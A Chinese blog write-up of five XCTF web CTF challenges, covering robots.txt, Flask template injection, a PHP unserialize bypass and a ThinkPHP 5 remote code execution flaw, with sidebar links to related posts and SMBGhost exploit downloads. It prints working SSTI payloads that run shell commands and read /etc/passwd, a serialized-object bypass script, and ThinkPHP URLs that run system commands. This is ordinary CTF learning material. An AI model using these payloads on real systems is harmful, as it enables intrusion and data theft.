攻防世界web高手进阶php_rce,攻防世界 web高手进阶区 1-5 2020.6.11

最新推荐文章于 2023-05-15 18:00:00 发布
最新推荐文章于 2023-05-15 18:00:00 发布
阅读量254 收藏 1
点赞数
文章标签: 攻防世界web高手进阶php_rce

前言

继续ctf的旅程

攻防世界web高手进阶区的1-5题

1、baby_web

进去是个1.php

页面里只有helloworld

按题意是说想看初始网页

猜测有index.php

结果直接跳转到1.php

查看源码

在index的请求头里发现flag

3f2966a1bd2f8e263bab5c84b87a13b1.png

2、Training-WWW-Robots

这题不就是个robots嘛

没什么好说的了

进入robots.txt

发现php

进入php

发现flag

3、Web_python_template_injection

题目提示是python template injection

是SSTI。。。

。。。。。。

之前没接触过,现学

从零学习flask模板注入

寻找可用引用

{{''.__class__.__mro__[2].__subclasses__()}}

53b86f00e2b7603eb7c78204f33d92f4.png

找到我们想要 的 os 所在的 site._Printer 类,它在列表的第72位

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

4d58e2de42eaea75634a51ff2b101789.png

得到flag所在的位置

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

c94f5c7d8394ccb0160a3c23e2079f12.png

到手

也可以用

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

得到flag

注:

几个有用的payload

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[' os'].popen('cat fl4g').read()

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[' os'].system('ls')

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()

4、Web_php_unserialize

26f3f1767daf064d7f7bf4afdc9009c5.png

进来是这么一段源码

初始化传入值可以更改类中属性file的值

flag在fl4g.php

当demo实列销毁时会高亮显示file指向的文件内容

参数传入要求

先进行base64加密

preg_match()匹配绕过

unserialize() 反序列化执行_wakeup()的绕过

加密和反序列化都不是问题

关键是绕过正则匹配和_wakeup()

wakeup的绕过还行

当反序列化中object的个数和之前的个数不等时,wakeup就会被绕过

正则的绕过不太懂

查了查是说用“+”即可

后来找到一篇解释

大佬笔记

最后得到脚本

class Demo {

private $file = 'fl4g.php'; //flag在fl4g.php

}

$a= serialize(new demo); //序列化

//string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"

$a= str_replace('O:4', 'O:+4',$a); //用“+”绕过preg_match

$a= str_replace(':1:', ':4:',$a); //把对象个数从1变成大于1的个数绕过wakeup

echo base64_encode($a); //加密

?>

运行得到payload

TzorNDoiRGVtbyI6NDp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

放入url

ad71df81f92742a80893eb24bfb5a32d.png

得到flag

注:

关注版本问题

像“+”绕过正则是php5里的

5、php-rce

ThinkPHP版本5的相关漏洞

先随便输点东西试试

6accb672571ce1e35192dca7d805d90b.png

发现版本号

查了查漏洞

漏洞解析

拿个payload来试试

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

7ee0f63f859e4daa40e429fe4d6db95c.png

发现可用

修改下,寻找flag

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

8b3186fcc30e689aaadfbdfbc3d5aa59.png

直接就有了

原文链接:https://blog.csdn.net/weixin_44604541/article/details/106675774

榛子在发光
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SMBGhost_RCE_PoC-master.zip
06-11
CVE-2020-0796代码执行EXP,接管主机权限,获取用户shell。该文件主要以学习为主,请遵守网络安全法,如若造成破坏,与本人无关。
CVE-2020-0796_SMBGhost_RCE_exp.zip
06-05
CVE-2020-0796_SMBGhost_RCE_exp.zip CVE-2020-0796 exp
【XCTF 攻防世界WEB 高手进阶 PHP_RCE
weixin_45844670的博客
08-09 399
题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=5412 本题学到的: 使用 https://www.exploit-db.com/ 这个网站查漏洞,看网站有无可乘之机。 过程: 根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1 这里的payload: ?s=/index/\think\app/invokefunction&function=call_us
攻防世界-web-高手进阶003-php_rce
h0ld1rs的博客
08-11 316
文章目录题目漏洞5.0版本POC(不唯一)5.1版本POC(不唯一)题目解法 题目 上来之后就是这个网页,没有别的提示,于是搜索ThinkPHP v5,发现了可以利用的漏洞 漏洞 5.0版本POC(不唯一) 命令执行:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令] 文件写入:?s=index/\think\app/invokefuncti
攻防世界-Web-php_rce
uh_eng的博客
08-05 590
0x01 打开题目,很明显是ThinkPHP5框架,这里就联想到ThinkPHP5的著名漏洞,再加上题目中的RCE(远程代码执行)解题思路基本就有了。 关于ThinkPHP5的这个漏洞,可以参考:ThinkPHP5 RCE漏洞重现及分析 0x02 使用payload验证一下漏洞: /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=
攻防世界web高手进阶 php_rce
weixin_61835841的博客
04-21 1729
工具 火狐 1.打开链接,观察到这是一个Think PHP V5 框架 2.尝试输入index.php,发现页面没有变化,继续输入下一级文件(随便输入),发现爆出了版本5.0.20 3.查询相关版本的漏洞(百度或者github)都可以试试 、 查询到的payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 放进去尝试发现可
攻防世界php_rceWeb_php_include
qq_42728977的博客
01-19 2951
Web_php_unserialize php_rce web_php_include 1、漏洞点:php strstr() 绕过,伪协议包含漏洞 这个提有很多利用方法。 方法一: 访问页面看到如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php...
攻防世界web进阶_php_rce
chy082的博客
08-21 315
上网查一下ThinkPHP v5,发现有rce漏洞 找到网上的payload: /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 看看上级目录 http://220.249.52.133:37949/?s=index/\think\app/invokefunction&function=call_user_func_array&v
攻防世界 XCTFWEB 高手进阶 php_rce ——最全面、最直观的WP
algae
05-04 682
攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web
weixin_39603613的博客
03-09 246
php_rce首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参于是构造payloadhttp://111.198.29.45:30600/index.php?s=index/\think\App/i...
攻防世界web高手进阶php_rce,XCTF攻防世界_Web进阶001
weixin_39599654的博客
03-09 721
XCTF攻防世界_Web进阶001XCTF攻防世界_Web进阶001XCTF_Web_高手进阶baby_webTraining-WWW-RobotsWeb_php_unserializephp_rcebaby_web(1)按照提示,初始界面想到index.php,再次请求index.php后仍是1.php(被重定向了)。F12打开开发者模式查看“网络”模块,查看返回包发现确实有index.p...
攻防世界WEBphp_rce
qq_54929891的博客
08-28 197
进入题目页面我可以说是一脸懵逼 我还点了一下链接啥的,结果都是广告,抓了包看了原码没有发现什么问题,于是就上网看了一下别的关于这道题怎么写的,结果发现,这题目考的是ThinkPHP V5版本的那个时候一个漏洞,我顿时就懵了,作为新手根本就没听过这种东西,于是我长达了两天有空就看看,有了一点点感觉 https://blog.csdn.net/qq_40884727/article/details/101452478这个链接是一位博主对当年的漏洞复现,看了几遍,或许是我代码水平不怎么样,还是没怎么懂,.
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客...
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
flamelu#Vulnerability-1#金山 V8 终端安全系统 pdf_maker.php 未授权 RCE1
07-25
金山 V8 终端安全系统 pdf_maker.php 存在命令执行漏洞,由于没有过滤危险字符,导致构造特殊字符即可进行命令拼接执行任意命令.漏洞文件:Kings
php无参数函数实现rce,无参数读文件和RCE总结
weixin_28759987的博客
04-02 731
chr(time)chr(current(localtime(time)))chr(time) :chr 函数以256为一个周期,所以 chr(46) , chr(302) , chr(558) 都等于 "."所以使用 chr(time) ,一个周期必定出现一次 "."chr(current(localtime(time))) :数组第一个值每秒+1,所以最多60秒就一定能得到46,用 curre...
攻防世界web高阶(php rce
ctfmove1的博客
07-16 603
需要自己百度下thinkphp5的漏洞(其实看完就知道怎么做这个题目了) payload: s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪 s=index/think\App/invokeFunction&function=call_user_func_array&vars
攻防世界-web-进阶-php_rce
weixin_31610083的博客
11-10 3161
【题目描述】 无 【附件】 无 【过程及思路】 打开在线场景。 是一个关于ThinkPHP页面,看起来没什么特别的,几个链接点进去也都是正常的官方链接。 我们尝试到github搜索ThinkPHP V5,发现有相关的“远程代码执行”漏洞集合。 RCE(远程代码执行漏洞) 用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。...
攻防世界-web-php_rce
wuh2333的博客
05-15 490
攻防世界web安全,rce
攻防世界php_rce
最新发布
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值